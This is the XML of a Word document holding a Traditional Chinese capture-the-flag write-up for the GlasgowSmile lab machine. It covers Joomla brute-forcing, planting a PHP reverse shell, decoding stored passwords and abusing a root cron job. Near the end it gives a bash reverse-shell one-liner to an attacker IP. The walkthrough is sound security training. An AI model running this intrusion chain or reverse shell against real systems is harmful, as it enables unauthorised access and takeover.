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7325" cy="3923030"/>
            <wp:effectExtent l="0" t="0" r="5715" b="8890"/>
            <wp:docPr id="7" name="圖片 7" descr="GlasgowSmil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GlasgowSmil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TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>nmap掃出有開22,80 port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7325" cy="4394835"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:docPr id="6" name="圖片 6" descr="GlasgowSmi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GlasgowSmil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t>查看網頁是張圖片，沒什麼資訊，用dirsearch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dirsearch -u 192.168.216.79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得知是joomla CMS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4991735" cy="3787775"/>
            <wp:effectExtent l="0" t="0" r="6985" b="6985"/>
            <wp:docPr id="5" name="圖片 5" descr="GlasgowSmil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GlasgowSmile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joomscan -u 192.168.216.79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得知joomla版本為3.7.3rc1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google漏洞可惜都沒有效，sqlmap也無效，可能要考慮密碼爆破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9865" cy="534035"/>
            <wp:effectExtent l="0" t="0" r="3175" b="14605"/>
            <wp:docPr id="4" name="圖片 4" descr="GlasgowSmil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GlasgowSmil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7325" cy="2588895"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1905"/>
            <wp:docPr id="3" name="圖片 3" descr="GlasgowSmi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GlasgowSmile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查看/joomla/ dir發現首頁有joker對白，嘗試將網頁文字存成txt，當作字典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t>cewl http://192.168.216.79/joomla -m 5 -d 1 -w joomla.txt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用burpsuite爆破，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>user假設為joomla，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>會發現Gotham的length較他人不同，應該為密碼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73040" cy="2064385"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="8" name="圖片 8" descr="GlasgowSmil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GlasgowSmile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eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>進入joomla，找到extension-&gt;Templates下有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>index.php，似乎能在這裡放php reverse shell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用reverse shell generator生成php pentest monkey的reverse shell code，放進index.php內並執行Template Preview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7325" cy="1965960"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="2" name="圖片 2" descr="GlasgowSmil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GlasgowSmile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成功取得reverse shell，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>user為www-data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2567940" cy="1341120"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1" name="圖片 1" descr="GlasgowSmil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GlasgowSmile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在rob下發現local.txt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9230" cy="4060825"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:docPr id="16" name="圖片 16" descr="GlasgowSmil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GlasgowSmile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由於從網頁進入，通常會去查看/var/www下的config內容，在/var/www/joomla2下發現</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>configuration.php，有db的user/password (joomla/babyjoker)</w:t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71770" cy="3307715"/>
            <wp:effectExtent l="0" t="0" r="1270" b="14605"/>
            <wp:docPr id="15" name="圖片 15" descr="GlasgowSmil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GlasgowSmile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mysql -u joomla -p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進入mysql查看資料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9865" cy="1619250"/>
            <wp:effectExtent l="0" t="0" r="3175" b="11430"/>
            <wp:docPr id="14" name="圖片 14" descr="GlasgowSmil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GlasgowSmile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eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>在batjoke下的taskforce table發現rob的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>password hash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083175" cy="556260"/>
            <wp:effectExtent l="0" t="0" r="6985" b="7620"/>
            <wp:docPr id="13" name="圖片 13" descr="GlasgowSmil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GlasgowSmile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t>echo Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ | base64 -d;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得出密碼為</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>???AllIHaveAreNegativeThoughts???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii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/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="zh-TW"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>接著能su rob</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="zh-TW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9865" cy="312420"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
            <wp:docPr id="12" name="圖片 12" descr="GlasgowSmil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GlasgowSmile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73675" cy="2142490"/>
            <wp:effectExtent l="0" t="0" r="14605" b="6350"/>
            <wp:docPr id="11" name="圖片 11" descr="GlasgowSmil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GlasgowSmile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eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>查看剛剛在rob下permission denied的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Abnerineedyourhelp file，內容是一段亂碼，都是英文且相當整齊，有引號和句號，結尾則像是base64的hash，很可能是rot13類型加密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至CyberChief轉譯，用rot13發現還是無法閱讀，於是從rot1開始測試，成功變成可閱讀的文章，果真是一段base64 hash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5268595" cy="404495"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6985"/>
            <wp:docPr id="10" name="圖片 10" descr="GlasgowSmil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GlasgowSmile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t>echo STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA== | base64 -d;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/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>得出密碼為</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>I33hope99my0death000makes44more8cents00than0my0life0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4854575" cy="853440"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="9" name="圖片 9" descr="GlasgowSmil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GlasgowSmile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t>能成功su abner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1417955"/>
            <wp:effectExtent l="0" t="0" r="3175" b="14605"/>
            <wp:docPr id="19" name="圖片 19" descr="GlasgowSmil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GlasgowSmile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由於在abner下的user2.txt沒有提供任何線索，索性直接用linepas掃漏洞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發現一個名字特別的檔案-&gt;.dear_penguins.zip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根據前面流程從www-data -&gt; rob -&gt; abner，至題目大概率要把home底下的所有user都跑過一遍，所以這個檔案可能藏有penguin的資訊</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1247140"/>
            <wp:effectExtent l="0" t="0" r="3810" b="2540"/>
            <wp:docPr id="18" name="圖片 18" descr="GlasgowSmil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GlasgowSmile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t>scp abner@192.168.216.79:/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip .</w:t>
      </w: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t>將檔案從靶機載到本地</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1017905"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:docPr id="17" name="圖片 17" descr="GlasgowSmil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GlasgowSmile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unzip .dear_penguins.zip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cat dear_penguins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還真的有一段hash，很可能是penguin的密碼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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="481965"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5715"/>
            <wp:docPr id="26" name="圖片 26" descr="GlasgowSmil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GlasgowSmile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使用hash identifier發現無法辨識hash種類，直接當成密碼輸入能轉成penguin user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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="1067435"/>
            <wp:effectExtent l="0" t="0" r="1905" b="14605"/>
            <wp:docPr id="21" name="圖片 21" descr="GlasgowSmil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GlasgowSmile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用linpeas掃完沒特別明顯的攻擊點，這時候換成查看linpeas無法掃的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>執行中process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>，使用pspy64工具，從kali傳至靶機，執行後跑一段時間發現.trash_old每一分鐘執行一次，這個檔案正是penguin下的隱藏binary，可發現process的UID=0，由root在執行，可以將revsehll code放進.trash_old執行後門</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="601980"/>
            <wp:effectExtent l="0" t="0" r="13970" b="7620"/>
            <wp:docPr id="27" name="圖片 27" descr="GlasgowSmil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GlasgowSmile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echo "bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.45.209/1234 0&gt;&amp;1'" &gt; .trash_old</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>過一陣子即可取得reverse shell，user為root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rush Script MT">
    <w:panose1 w:val="03060802040406070304"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="20000001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656156"/>
    <w:rsid w:val="10287A8C"/>
    <w:rsid w:val="14DC15C1"/>
    <w:rsid w:val="15C45575"/>
    <w:rsid w:val="164A2FD3"/>
    <w:rsid w:val="1A777D76"/>
    <w:rsid w:val="1A9F5F74"/>
    <w:rsid w:val="1E795065"/>
    <w:rsid w:val="1F847090"/>
    <w:rsid w:val="25BC36FD"/>
    <w:rsid w:val="28FC79D8"/>
    <w:rsid w:val="2F5510EA"/>
    <w:rsid w:val="352B7F7B"/>
    <w:rsid w:val="35ED2212"/>
    <w:rsid w:val="378D3662"/>
    <w:rsid w:val="39103100"/>
    <w:rsid w:val="3C3D44B5"/>
    <w:rsid w:val="3E056218"/>
    <w:rsid w:val="3E9C6A78"/>
    <w:rsid w:val="45E55DA6"/>
    <w:rsid w:val="46C14838"/>
    <w:rsid w:val="47840087"/>
    <w:rsid w:val="48B82895"/>
    <w:rsid w:val="48EF28A4"/>
    <w:rsid w:val="4AF725CF"/>
    <w:rsid w:val="4DAC06CF"/>
    <w:rsid w:val="4EBA6365"/>
    <w:rsid w:val="4FC332E9"/>
    <w:rsid w:val="535645A2"/>
    <w:rsid w:val="54F82528"/>
    <w:rsid w:val="5F3065AF"/>
    <w:rsid w:val="5FD35693"/>
    <w:rsid w:val="612C6D34"/>
    <w:rsid w:val="6968782A"/>
    <w:rsid w:val="6CE6624C"/>
    <w:rsid w:val="7C9826EE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2024-06-07T17:45:16Z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